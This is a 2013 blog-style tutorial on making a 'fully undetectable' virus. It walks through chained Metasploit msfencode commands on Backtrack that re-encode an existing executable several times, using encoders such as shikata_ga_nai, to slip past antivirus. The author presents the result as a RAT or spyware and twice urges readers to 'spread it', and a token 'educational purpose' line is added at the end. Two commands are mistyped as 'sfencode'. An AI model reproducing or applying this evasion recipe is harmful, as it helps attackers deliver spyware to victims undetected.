Saturday, May 11, 2013


video tutorial:

url for proof :

tools required :

1.) Backtrack OS

2.)Msf  encoders

NOTE: FUD virus will work only in 32-bit OS as msf encoders are x86- bit 

for 64-bit u can try x64-bit encoder !!

use following commands in backtrack:

So our first step is to change the permissions of that file (775) by typing this command, 

> " chmod 775 virus.exe"  press enter

(u have to put that directory in which ur virus.exe is present i have in root folder so it will be"/root/virus.exe")

> "msfencode  -i /root/Virus.exe  -t raw  -o 

/root/virus2.exe -e x86/shikata_ga_nai -c 10"

> "chmod 775 virus2.exe"

>"msfencode  -i /root/virus2.exe  -t raw  -o 

/root/virus3.exe -e x86/jmp_call_additive -c 1 "

> "chmod 775 virus3.exe "
> "sfencode  -i /root/virus3.exe  -t raw  -o 

/root/virus4.exe -e x86/call4_dword_xor -c 1"

>"chmod 775 virus4.exe"

>"sfencode  -i /root/virus4.exe  -t raw  -o 

/root/virus5.exe -e x86/shikata_ga_nai -c 1"

its over now cheack you root folder ther is virus5.exe which i now you FUD virus !!
njoy spreading !

it can be your RAT/spyware !!
spread it!!

this demostration is only for educational purpose!!